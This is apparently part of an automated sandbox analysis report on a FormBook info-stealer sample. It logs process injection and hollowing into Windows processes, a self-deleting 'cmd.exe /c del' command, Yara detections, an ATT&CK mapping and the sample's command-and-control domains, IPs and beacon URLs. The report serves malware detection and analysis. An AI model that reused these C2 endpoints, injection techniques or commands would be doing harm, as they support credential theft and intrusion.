          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7AE73 mov eax, dword ptr fs:[00000030h]13_2_04C7AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7AE73 mov eax, dword ptr fs:[00000030h]13_2_04C7AE73
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5C600 mov eax, dword ptr fs:[00000030h]13_2_04C5C600
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5C600 mov eax, dword ptr fs:[00000030h]13_2_04C5C600
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5C600 mov eax, dword ptr fs:[00000030h]13_2_04C5C600
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C88E00 mov eax, dword ptr fs:[00000030h]13_2_04C88E00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C68A0A mov eax, dword ptr fs:[00000030h]13_2_04C68A0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5AA16 mov eax, dword ptr fs:[00000030h]13_2_04C5AA16
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5AA16 mov eax, dword ptr fs:[00000030h]13_2_04C5AA16
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8A61C mov eax, dword ptr fs:[00000030h]13_2_04C8A61C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8A61C mov eax, dword ptr fs:[00000030h]13_2_04C8A61C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C73A1C mov eax, dword ptr fs:[00000030h]13_2_04C73A1C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5E620 mov eax, dword ptr fs:[00000030h]13_2_04C5E620
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D0FE3F mov eax, dword ptr fs:[00000030h]13_2_04D0FE3F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD53CA mov eax, dword ptr fs:[00000030h]13_2_04CD53CA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD53CA mov eax, dword ptr fs:[00000030h]13_2_04CD53CA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]13_2_04C803E2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]13_2_04C803E2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]13_2_04C803E2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]13_2_04C803E2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]13_2_04C803E2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C803E2 mov eax, dword ptr fs:[00000030h]13_2_04C803E2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C937F5 mov eax, dword ptr fs:[00000030h]13_2_04C937F5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C61B8F mov eax, dword ptr fs:[00000030h]13_2_04C61B8F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C61B8F mov eax, dword ptr fs:[00000030h]13_2_04C61B8F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D0D380 mov ecx, dword ptr fs:[00000030h]13_2_04D0D380
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C68794 mov eax, dword ptr fs:[00000030h]13_2_04C68794
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8B390 mov eax, dword ptr fs:[00000030h]13_2_04C8B390
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD7794 mov eax, dword ptr fs:[00000030h]13_2_04CD7794
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD7794 mov eax, dword ptr fs:[00000030h]13_2_04CD7794
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CD7794 mov eax, dword ptr fs:[00000030h]13_2_04CD7794
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D1138A mov eax, dword ptr fs:[00000030h]13_2_04D1138A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D25BA5 mov eax, dword ptr fs:[00000030h]13_2_04D25BA5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5DB40 mov eax, dword ptr fs:[00000030h]13_2_04C5DB40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6EF40 mov eax, dword ptr fs:[00000030h]13_2_04C6EF40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D28B58 mov eax, dword ptr fs:[00000030h]13_2_04D28B58
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5F358 mov eax, dword ptr fs:[00000030h]13_2_04C5F358
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5DB60 mov ecx, dword ptr fs:[00000030h]13_2_04C5DB60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6FF60 mov eax, dword ptr fs:[00000030h]13_2_04C6FF60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C83B7A mov eax, dword ptr fs:[00000030h]13_2_04C83B7A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C83B7A mov eax, dword ptr fs:[00000030h]13_2_04C83B7A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D28F6A mov eax, dword ptr fs:[00000030h]13_2_04D28F6A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8A70E mov eax, dword ptr fs:[00000030h]13_2_04C8A70E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8A70E mov eax, dword ptr fs:[00000030h]13_2_04C8A70E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D1131B mov eax, dword ptr fs:[00000030h]13_2_04D1131B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7F716 mov eax, dword ptr fs:[00000030h]13_2_04C7F716
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEFF10 mov eax, dword ptr fs:[00000030h]13_2_04CEFF10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEFF10 mov eax, dword ptr fs:[00000030h]13_2_04CEFF10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D2070D mov eax, dword ptr fs:[00000030h]13_2_04D2070D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D2070D mov eax, dword ptr fs:[00000030h]13_2_04D2070D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C54F2E mov eax, dword ptr fs:[00000030h]13_2_04C54F2E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C54F2E mov eax, dword ptr fs:[00000030h]13_2_04C54F2E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8E730 mov eax, dword ptr fs:[00000030h]13_2_04C8E730
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.thenorthgoldline.com
          Source: C:\Windows\explorer.exeDomain query: www.cochez.club
          Source: C:\Windows\explorer.exeDomain query: www.vermogenswerte.com
          Source: C:\Windows\explorer.exeDomain query: www.aizaibali.com
          Source: C:\Windows\explorer.exeDomain query: www.extinctionbrews.com
          Source: C:\Windows\explorer.exeNetwork Connect: 95.215.210.10 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.boatrace-life04.net
          Source: C:\Windows\explorer.exeNetwork Connect: 172.104.157.41 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cindywillardrealtor.com
          Source: C:\Windows\explorer.exeDomain query: www.wideawakemomma.com
          Source: C:\Windows\explorer.exeDomain query: www.livegaming.store
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.81.221 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.88.31.204 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.saludflv.info
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeSection loaded: unknown target: C:\Users\user\Desktop\pMbPS8nCm1.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3472Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: EB0000Jump to behavior
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeProcess created: C:\Users\user\Desktop\pMbPS8nCm1.exe 'C:\Users\user\Desktop\pMbPS8nCm1.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pMbPS8nCm1.exe'Jump to behavior
          Source: explorer.exe, 00000003.00000000.283537676.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000D.00000002.509596588.00000000034E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.283537676.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000D.00000002.509596588.00000000034E0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.283537676.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000D.00000002.509596588.00000000034E0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000003.00000000.251221123.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000003.00000000.283537676.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000D.00000002.509596588.00000000034E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000003.00000000.283537676.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000D.00000002.509596588.00000000034E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion2Input Capture1Security Software Discovery121Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsSystem Information Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452687 Sample: pMbPS8nCm1.exe Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 35 www.melodezu.com 2->35 37 www.garimpeirastore.online 2->37 39 melodezu.com 2->39 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 5 other signatures 2->51 11 pMbPS8nCm1.exe 2->11         started        signatures3 process4 signatures5 59 Detected unpacking (changes PE section rights) 11->59 61 Maps a DLL or memory area into another process 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 14 pMbPS8nCm1.exe 11->14         started        process6 signatures7 65 Modifies the context of a thread in another process (thread injection) 14->65 67 Maps a DLL or memory area into another process 14->67 69 Sample uses process hollowing technique 14->69 71 Queues an APC in another process (thread injection) 14->71 17 explorer.exe 14->17 injected process8 dnsIp9 29 cochez.club 95.215.210.10, 49734, 80 NEWIT-ASRU Russian Federation 17->29 31 vermogenswerte.com 172.104.157.41, 49739, 80 LINODE-APLinodeLLCUS United States 17->31 33 14 other IPs or domains 17->33 43 System process connects to network (likely due to code injection or exploit) 17->43 21 raserver.exe 12 17->21         started        signatures10 process11 dnsIp12 41 www.aizaibali.com 21->41 53 Modifies the context of a thread in another process (thread injection) 21->53 55 Maps a DLL or memory area into another process 21->55 57 Tries to detect virtualization through RDTSC time measurements 21->57 25 cmd.exe 1 21->25         started        signatures13 process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          pMbPS8nCm1.exe27%VirustotalBrowse
          pMbPS8nCm1.exe41%ReversingLabsWin32.Trojan.Caynamer
          pMbPS8nCm1.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          13.2.raserver.exe.302d450.3.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.pMbPS8nCm1.exe.5a0000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.1.pMbPS8nCm1.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.pMbPS8nCm1.exe.6f0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.pMbPS8nCm1.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          13.2.raserver.exe.5167960.6.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.cochez.club/dy8g/?i8PHMrf=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu&5jLtOl=htxh0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.extinctionbrews.com/dy8g/?i8PHMrf=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p&5jLtOl=htxh0%Avira URL Cloudsafe
          http://www.thenorthgoldline.com/dy8g/?i8PHMrf=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q&5jLtOl=htxh0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.cindywillardrealtor.com/dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxh0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.vermogenswerte.com/dy8g/?i8PHMrf=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r&5jLtOl=htxh0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          www.extinctionbrews.com/dy8g/0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.aizaibali.com/100%Avira URL Cloudmalware
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.wideawakemomma.com/dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxh100%Avira URL Cloudmalware
          http://www.aizaibali.com/dy8g/?i8PHMrf=iLV9pktedYDy4Ry4OVO/uadmgyKbVGN100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          extinctionbrews.com
          		34.102.136.180
          		truefalse
            		unknown
            wideawakemomma.com
            		34.102.136.180
            		truefalse
              		unknown
              vermogenswerte.com
              		172.104.157.41
              		truetrue
                		unknown
                www.aizaibali.com
                		154.88.31.204
                		truetrue
                  		unknown
                  cochez.club
                  		95.215.210.10
                  		truetrue
                    		unknown
                    www.garimpeirastore.online
                    		209.99.40.222
                    		truetrue
                      		unknown
                      melodezu.com
                      		64.227.87.162
                      		truetrue
                        		unknown
                        cindywillardrealtor.com
                        		34.102.136.180
                        		truefalse
                          		unknown
                          825610.parkingcrew.net
                          		75.2.81.221
                          		truefalse
                            		high
                            www.thenorthgoldline.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.boatrace-life04.net
                              		unknown
                              		unknowntrue
                                		unknown
                                www.melodezu.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.cochez.club
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.cindywillardrealtor.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.wideawakemomma.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.vermogenswerte.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.livegaming.store
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.extinctionbrews.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.saludflv.info
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.cochez.club/dy8g/?i8PHMrf=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu&5jLtOl=htxhtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.extinctionbrews.com/dy8g/?i8PHMrf=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p&5jLtOl=htxhfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.thenorthgoldline.com/dy8g/?i8PHMrf=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q&5jLtOl=htxhtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.cindywillardrealtor.com/dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxhfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.vermogenswerte.com/dy8g/?i8PHMrf=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r&5jLtOl=htxhtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                www.extinctionbrews.com/dy8g/true
                                                • Avira URL Cloud: safe
                                                		low
                                                http://www.wideawakemomma.com/dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxhfalse
                                                • Avira URL Cloud: malware
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.comexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.tiro.comexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.goodfont.co.krexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.carterandcone.comlexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.typography.netDexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
